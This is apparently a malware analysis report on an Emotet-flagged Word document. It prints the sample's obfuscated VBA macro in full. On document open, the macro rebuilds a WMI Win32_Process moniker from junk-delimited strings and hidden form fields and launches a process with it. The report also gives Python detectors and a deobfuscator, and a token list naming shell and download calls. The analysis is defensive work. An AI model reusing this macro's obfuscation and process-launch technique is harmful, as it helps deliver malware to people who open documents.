Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b69f6b3d9d08675…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 93.6 KB
Created: 2019-12-18 22:09:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: f0bd6294fab36c74e9134307d4b454b3
SHA-1: d7de6049702f802e73e39ef3306b08e21e03c352
SHA-256: 4b69f6b3d9d0867579eb36dc0a44f084d94dc5653e9cbcdefcccea7ac7b84fcc
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7464930-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. In this sample the hidden storage is a TextBox on ThisDocument (Rnuekdgnz.Aklhsdytvadu, declared by the VB_Control attribute in the extracted source) plus ControlTipText values on the Afvutucle form; the Split/Join call strips a junk delimiter from a string that is then used as an object moniker. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive: the document needs the user to enable macros.
    Matched line in script
    Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers only on the combination of two token classes co-occurring in the same compiled VBA (p-code) or cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell, download or object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither class alone fires it; the pairing is what flags p-code-only documents, or documents whose source extraction failed, where no readable VBA source is available. The tokens that matched are named in the finding's detail line.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    Caveat: this is the standard DrawingML XML namespace identifier that Office writes into any document containing drawing content. It is not a download or command-and-control location and should not be treated as a network indicator for this sample.
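The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above describes its logic in words only. The following is an added illustration, not code from the analysis tool that produced this report: it scans raw stream bytes for the two token classes in both encodings identifiers take in compiled module streams (8-bit and UTF-16LE), and fires only when a token from each class is present. The four byte strings are constructed stand-ins for stream fragments, not bytes from the sample.

```python
import re

# Token classes exactly as the heuristic describes them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def token_patterns(token):
    """Case-insensitive byte patterns for one token in the two encodings
    identifiers take inside compiled module streams: 8-bit and UTF-16LE.
    The negative lookbehind stops 'Shell' from matching inside 'PowerShell'."""
    narrow = re.escape(token.encode("ascii"))
    wide = re.escape(token.encode("utf-16-le"))
    return (re.compile(rb"(?<![A-Za-z0-9_])" + narrow, re.IGNORECASE),
            re.compile(rb"(?<![A-Za-z0-9_]\x00)" + wide, re.IGNORECASE))


def find_tokens(stream, tokens):
    """Names of the tokens present in the raw stream bytes, in list order."""
    return [t for t in tokens if any(p.search(stream) for p in token_patterns(t))]


def pcode_autoexec_exec(stream):
    """Return (fires, autoexec_hits, exec_hits). `fires` is True only when
    at least one token from EACH class is present in the same stream."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return bool(auto) and bool(execs), auto, execs


# Constructed byte strings standing in for fragments of module streams;
# they are not bytes taken from the sample.
STREAM_BOTH = (b"\x01\x00\x00\x00Document_Open\x00\x00"
               + "CreateObject".encode("utf-16-le") + b"\x00\x00winmgmts:")
STREAM_AUTOEXEC_ONLY = b"\x00\x00AutoOpen\x00\x00MsgBox\x00"
STREAM_EXEC_ONLY = b"\x00\x00" + "ShellExecute".encode("utf-16-le") + b"\x00"
STREAM_POWERSHELL = b"\x00powershell.exe -enc AAAA\x00"

if __name__ == "__main__":
    cases = (("both", STREAM_BOTH), ("autoexec only", STREAM_AUTOEXEC_ONLY),
             ("exec only", STREAM_EXEC_ONLY), ("powershell only", STREAM_POWERSHELL))
    for name, stream in cases:
        print(name, pcode_autoexec_exec(stream))
```

In practice the input would be each module stream pulled out of the VBA project storage (olevba's raw stream access is one way to get them); the value of running it over the compiled stream rather than the decompressed source is that it still works when the source attribute text has been stripped or the decompression fails.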

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11000 bytes
SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
294 of 513 identifiers look randomly generated (e.g. 'Sctlzdxzxdrqf') — consistent with name-mangling obfuscation.
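The identifier-randomness check above is reported as a count without its method. The following is an added illustration of one cheap way to make such a call, not the scorer the report used, and it will not reproduce the 294 of 513 figure: it pulls identifiers out of VBA source, discards keywords and string contents, and flags names with too few vowels or a long consonant run. The sample source is a constructed excerpt of statements copied from the preview below, not the full artifact.

```python
import re

# VBA keywords and built-ins that appear in the preview; excluded from scoring.
VBA_KEYWORDS = {
    "attribute", "dim", "as", "integer", "string", "double", "boolean", "set",
    "private", "public", "sub", "function", "end", "do", "while", "loop",
    "false", "true", "join", "split", "createobject", "vba", "nothing", "if",
    "then", "else", "for", "next", "to", "call", "with",
}
VOWELS = set("aeiou")


def identifiers(src):
    """Unique identifiers from VBA source, ignoring string literal contents,
    comments, Attribute lines and the keywords above."""
    src = re.sub(r'"[^"]*"', '""', src)
    src = re.sub(r"'.*", "", src)
    names = set()
    for line in src.splitlines():
        if line.lstrip().lower().startswith("attribute "):
            continue
        for tok in re.findall(r"\b[A-Za-z_]\w*\b", line):
            if tok.lower() not in VBA_KEYWORDS:
                names.add(tok)
    return names


def looks_random(name):
    """Cheap pronounceability test: a name of six or more letters is flagged
    when fewer than a quarter of its letters are vowels or when it contains a
    run of four or more consonants (y counts as a consonant)."""
    letters = re.sub(r"[^A-Za-z]", "", name).lower()
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", letters)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 4


def mangling_ratio(src):
    """(flagged_count, total_count, sorted flagged names) for the source."""
    names = identifiers(src)
    flagged = sorted(n for n in names if looks_random(n))
    return len(flagged), len(names), flagged


# Constructed excerpt of the extracted macro (statements copied from the
# preview; not the full 11000-byte artifact).
SAMPLE_SRC = '''Private Sub Document_open()
   Fnwyraaizzj = Ogjykxkgdc
Dim Trjbegijg As Integer
Dim Suhisjqqtsle As String
Ileuznrbp = ("Laurie")
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText
End Sub
'''

if __name__ == "__main__":
    flagged_n, total, flagged = mangling_ratio(SAMPLE_SRC)
    print(f"{flagged_n} of {total} identifiers look randomly generated: {flagged}")
```

The test deliberately misses vowel-rich mangled names such as Afvutucle, which is why a ratio over hundreds of identifiers is a better signal than any single name; a bigram model trained on real VBA corpora would catch more, but the consonant-run rule is enough to separate this sample from ordinary business macros.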
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
   Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
   Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub

Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
   Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
   Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
   Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcmzf = "Perspiciatis."
Qgwdeshxx = 313
Bqwkbpkzip = Ipiwqzcqevo + Afvutucle.Sjrnukxepun + Afvutucle.Rwzjuoionfy.Factoid
   Midsxvzperwg = Jqfiynjahuwgy
Kqbfxqpppgz = 953
Gcizenhgztvp = ("Voluptatem voluptates explicabo.")
Aivrxxauau = (262)
Dim Itapczoot As Double
Dim Wbluilxgpo As Integer
Dim Guocaumcnxx As Integer
Dim Fkrwbutvwyq As Integer
Dim Ridomtef As Boolean
Dim Nwnugcyzdhgc As Integer
Dim Jotkskvyr As String
Dyylezim = (155)
Dim Znzntyzm As Double
Ohxeyzumjapfq = ("Amet assumenda corrupti necessitatibus dolores deleniti doloremque magnam tempora.")
Dznzhxqm = (779)
Dim Atwzmvlman As Integer
Tnffwcoo = Hkpymnxzyvuux
Mxedsqegbgzub = Xoqdlmjniyp
Zgzqzijekka = "Terry"
Dnrmsvxk = 745
Wzwxawzlswk = Fmenbjha + Bqwkbpkzip + Fmenbjha
   Smdkthrx = Wgxvvyhofof
Xzojgunmfwu = 649
Ecgsrofqyeq = ("Non facilis dicta quisquam.")
Mglsdxmw = (36)
Dim Fxldqcrkcc As Boolean
Dim Einxrazzuxqf As Integer
Dim Bmtwfsyra As Integer
Dim Loohunqus As Integer
Dim Fggmxgqh As String
Dim Vjbfqfwnw As String
Dim Tqfllrajz As Double
Fyhnqtvrbtm = (620)
Dim Fmbdhugwovm As Integer
Amoqxitg = ("Quibusdam laudantium harum.")
Xdpdsemn = (132)
Dim Pgyqwbfetqc As Boolean
Ptidkvehiajda = Orchfzltoyt
Onnadfaj = Brcihfom
Oqboupydzu = "Jordan"
Absumjaurhe = 652
End Function
Function Odmoouhgcoht()
   Wgigiqzqxuh = Beloxxtqz
Gnpvdhwvmmp = 125
Spivnsjekyev = ("Qui et qui sunt qui enim.")
Anfzxlraubdnq = (843)
Dim Xtmjsvioxd As Integer
Dim Lvplzqhwhg As Boolean
Dim Ibsuhszcltne As Boolean
Dim Ueryiwqzfe As Double
Dim Exjbeqguarc As Double
Dim Edeasiksn As Double
Dim Ejyqbjvo As Integer
Nbtjpwyxkcb = (622)
Dim Dsmymwuxqbf As Integer
Sptrvoxqrbkr = ("Qui.")
Lvdtbasuyo = (56)
Dim Rvtxanmud As String
Thngamqbh = Ibniewcyqe
Wbwtbxfjicq = Ourihndzin
Siprfsamtq = "Ea ea itaque exercitationem repudiandae quisquam autem quos aut."
Tpdbzafl = 438
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
   Mmbtadhosa = Ujbivtkuivmq
Jkwfonuxulzsv = 121
Ahhjvarmv = ("Quis ratione cum aliquam sit quaerat veniam aliquid.")
Ezbqzlddtxrnm = (23)
Dim Xpqicympiofgt As Integer
Dim Xaooiuvdloor As Double
Dim Ituqydcvm As String
Dim Rkscueji As Integer
Dim Ryyjdble As Double
Dim Hiizulpvsqb As Integer
Dim Mrkdbrje As Double
Grvvhvcq = (625)
Dim Zuibtijpopky As Boolean
Lssyknljxfchy = ("Amet ipsa et nihil ut.")
Zqakvbsii = (354)
Dim Huptsioxjpcd As Integer
Gqwczljt = Zknhwtjjosf
Enttbftxmuho = Gjyionbtivgb
Sonxpwspf = "Ramiro"
Onrnpgsky = 687
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
   Zxrjsuuw = Pvngwezxeacp
Grembiahqre = 889
Cqfnaurkgq = ("Consequuntur.")
Pfyxryjyadb = (135)
Dim Vhtiewbmrw As Double
Dim Mcvhgzavylccj As Double
Dim Vmlzppeemxbb As String
Dim Bxiryfwoq As Double
Dim Atkkfryf As Boolean
Dim Zgxrjhxij As Double
Dim Goxntlkuvgvrv As Integer
Uthgdwqabrlao = (353)
Dim Fgqftfmwlfnli As Integer
Obbnmeac = ("Nemo.")
Qovwilvw = (128)
Dim Paqvqhxv As Double
Kiaxcjyblue = Ddqqadurolz
Lfxegfclqhn = Znulcvllmszr
Gxwwbioxsdgn = "Quis inventore sit hic quo."
Dnvdshdh = 152
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText + Afvutucle.Kwnqamuppcgx.ControlTipText
   Utsrjsymed = Iaqmfqkywvm
Ratfxsjlktiev = 848
Fdfidtusqzxgb = ("Sed est.")
Yhjsssfhhly = (114)
Dim Hhhknlttqeffw As Boolean
Dim Gzlhyvva As Integer
Dim Jhavywfp As Boolean
Dim Irnsqtwicd As Integer
Dim Kcbhzqfclgmhd As String
Dim Xrizqawtomsr As Integer
Dim Nyrqnwxurwpjt As Integer
Fgomzzqu = (831)
Dim Vojnvhzbeyiu As Double
Hwcalkhgwri = ("Ut quia.")
Fezwdovs = (418)
Dim Hvpqhpbtlqz As String
Wqjtoorr = Dtwfbfguxzi
Vuzruywoe = Cguuhdqw
Mwkjzofvb = "Facere qui."
Alnyowwthayt = 436
Esydxetckuhsv = Sheihghumywl + Rnuekdgnz.Aklhsdytvadu
   Fdzemvjzjsifz = Cswaathrat
Vqtwcrbwnhsy = 809
Wlpvpsfiqmb = ("Omnis enim iste et iste.")
Eylzkkbn = (706)
Dim Wfoyqwvzxbm As Double
Dim Bfdjomzhvknxx As Boolean
Dim Hoxamvtqb As Double
Dim Lumdrrhcjug As Double
Dim Akhbuabsun As Boolean
Dim Dlkaiocoaa As Boolean
Dim Rtwpvsoanlzc As Double
Vbtvrhutnfwc = (409)
Dim Emmafmjbd As String
Czqwrlhlqtbve = ("Accusantium officiis qui possimus.")
Ayfqttqiwazzx = (4)
Dim Uxhypidxw As Integer
Qlldqhqillv = Dlquvslkjhyd
Uoxajwecf = Krjprxykpvds
Diehdmzc = "Est provident aut molestias sint."
Tokmqoaftblbc = 731
Set Odmoouhgcoht = CreateObject(Esydxetckuhsv)
   Zuzigbnzsb = Zxtmwbojbmwh
Axiixnqfhp = 763
Wvsykzdw = ("Earnest")
Bdbkbgjnysbu = (557)
Dim Rjepeuqeose As Boolean
Dim Cbwekzjvehm As Boolean
Dim Vurfcbucha As String
Dim Srbxpjgipgl As Integer
Dim Rvrvmcseuyw As String
Dim Qdzouabrr As Double
Dim Xpygduoip As Integer
Fchuydiyte = (380)
Dim Tcjbmkzwz As Boolean
Xxelazjnxq = ("Voluptatem.")
Whacyitodmifd = (803)
Dim Cxqvlssjxtri As String
Rnqoemumib = Zglpziggg
Vtfdydihz = Lysrziyqp
Gsmxiujcr = "Voluptatem aut."
Guuziviz = 797
Odmoouhgcoht.XSize = False
   Gqlargef = Jpxqfekyxlfc
Wvpwogxua = 281
Zxagnpirmhzq = ("Velit sapiente exercitationem.")
Ptbefyez = (788)
Dim Vqhqjtpom As Double
Dim Gjrjvwleb As String
Dim Xuynwqvmp As Integer
Dim Wkxirhsrkeuw As String
Dim Jukbsvchqs As Double
Dim Wxytzihlmgmm As String
Dim Ljladyoc As Boolean
Lkwdsoueuzkv = (671)
Dim Empxydixxpks As String
Podukdhpldt = ("Leland")
Hrfspqtvrj = (35)
Dim Jnongszs As Integer
Gvqlpkoalea = Frwvccux
Qaqtcekufj = Kcdbjgqxmd
Ivkxxpirai = "In fuga."
Yqmvbjuhit = 723
Odmoouhgcoht.YSize = False
   Thpffxgixhx = Ygkkkvjo
Mkarpmclq = 561
Sdhwpcojh = ("Amet necessitatibus voluptatibus assumenda eius eum est nesciunt totam.")
Wfrmjedm = (964)
Dim Wzdvefrwvvhlu As Double
Dim Cnutuepj As Integer
Dim Vacdxiehgwe As Integer
Dim Kwwmldvk As Integer
Dim Jgritjuhqu As Boolean
Dim Fptxmdeojy As Boolean
Dim Kwxsdfndko As Boolean
Gzkxlonjuarhs = (950)
Dim Sfwblifywlc As Integer
Gdzqxwqmsg = ("Ex et est labore quia quasi repellendus et.")
Korjfqzoovyn = (442)
Dim Obbnmjkcc As Integer
Akvydzzu = Tnorucpw
Mdqiolfut = Laiegdqkw
Gguonvrgvgrm = "Ducimus totam omnis."
Unjsueawthngn = 580
Do While Klymuqeo.Create(UJNDB & Wzwxawzlswk, Watbnmftlfyf, Odmoouhgcoht, Ednkgktl)
Loop
   Gbpywqsedvzbt = Yfbpvtnn
Dkchnmvtpz = 440
Swwswjbayyyy = ("Jackie")
Ecketnpptgp = (313)
Dim Idhddzfmetc As Double
Dim Mzkfmdaa As Boolean
Dim Ilfmdcdpdaus As Double
Dim Vvzcbzjhhqb As Double
Dim Oulwpajyr As Integer
Dim Ckbdzwitct As String
Dim Exzikbeolmw As String
Sdfrnsdxmaqyf = (431)
Dim Hhomecgyqs As String
Njbpnlhhtdcoa = ("Omnis et saepe.")
Sxikesugdykl = (298)
Dim Eoznuqokkd As Integer
Bqefzlxjnbhiu = Cyrdaovoocag
Imfxfrdcx = Njxdgrtpxmmtz
Gbpcyfhdfo = "Quo dolores."
Pnpzatemex = 632
End Function
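The stager and CreateObject findings above match single lines, but the object names only become readable once the Split/Join delimiter stripping and the string concatenations are followed through. The following is an added example, not part of the report or of olevba: a small static resolver that evaluates the string-building statements from the preview in order, deletes the junk delimiter the way Join(Split(x, d), "") does, and keeps anything it cannot see (JJKBSKJ, the form controls) as a visible placeholder. The value of the text box Rnuekdgnz.Aklhsdytvadu lives in the document's form data rather than in the macro text, so the single-letter value passed in at the end is a hypothetical input; because WMI class names are case-insensitive, either case of p closes the first moniker to Win32_Process, and the second CreateObject argument, built from the same text box plus two ControlTipText values, names the object whose XSize and YSize the macro sets afterwards, which is consistent with Win32_ProcessStartup.

```python
import re

# Constructed excerpt: the statements from the extracted macro preview that
# build the object monikers, with the filler statements between them dropped.
SAMPLE_VBA = r'''
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText + Afvutucle.Kwnqamuppcgx.ControlTipText
Esydxetckuhsv = Sheihghumywl + Rnuekdgnz.Aklhsdytvadu
Set Odmoouhgcoht = CreateObject(Esydxetckuhsv)
'''

LITERAL_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
SPLIT_JOIN = re.compile(r'Join\(Split\((.*?),\s*(\w+)\),\s*""\)')
STR_LITERAL = re.compile(r'"([^"]*)"')
CREATEOBJ = re.compile(r'CreateObject\((.*)\)\s*$')


def split_top_level(expr):
    """Split a VBA string expression on the '+' and '&' concatenation
    operators that sit outside parentheses and string literals, so the
    operands of a nested Join(Split(...)) stay together."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch in '+&' and depth == 0:
                parts.append(''.join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return [p for p in parts if p]


def resolve_term(term, known, form_values):
    """Evaluate one operand: a string literal, a Join(Split(x, d), "")
    reconstruction (delete every copy of delimiter d from x), a variable
    resolved earlier, or a Form.Control.Property reference whose value the
    analyst read out of the form data. Anything else stays a <placeholder>
    so the unresolved piece remains visible in the result."""
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1]
    m = SPLIT_JOIN.fullmatch(term)
    if m:
        delim = known.get(m.group(2))
        if delim is None:
            return '<' + term + '>'
        return ''.join(''.join(STR_LITERAL.findall(m.group(1))).split(delim))
    if term in known:
        return known[term]
    if term in form_values:
        return form_values[term]
    return '<' + term + '>'


def resolve_strings(src, form_values=None):
    """Single forward pass over the source: resolve string assignments in
    order, then the argument of every CreateObject call. Returns
    ({variable: value}, [createobject_argument, ...])."""
    form_values = form_values or {}
    known = dict(LITERAL_ASSIGN.findall(src))
    objects = []
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if m and m.group(1) not in known:
            name, expr = m.groups()
            known[name] = ''.join(resolve_term(t, known, form_values)
                                  for t in split_top_level(expr))
        c = CREATEOBJ.search(line)
        if c:
            objects.append(''.join(resolve_term(t, known, form_values)
                                   for t in split_top_level(c.group(1))))
    return known, objects


if __name__ == '__main__':
    # Without form data the text box stays a placeholder in both monikers.
    known, objects = resolve_strings(SAMPLE_VBA)
    for arg in objects:
        print('CreateObject(' + arg + ')')
    # With a hypothetical single-letter value for it the first moniker closes.
    known, objects = resolve_strings(
        SAMPLE_VBA, {'Rnuekdgnz.Aklhsdytvadu': 'p'})  # assumed value
    print(known['Scryvwusn'])
```

To apply it to the real artifact, feed the olevba-decoded source to resolve_strings and fill form_values from the form control properties (olevba's form-string extraction or a manual look at the UserForm stream); the placeholders in the output list exactly which controls still need reading before the command line passed to the Create call on the Win32_Process object can be recovered.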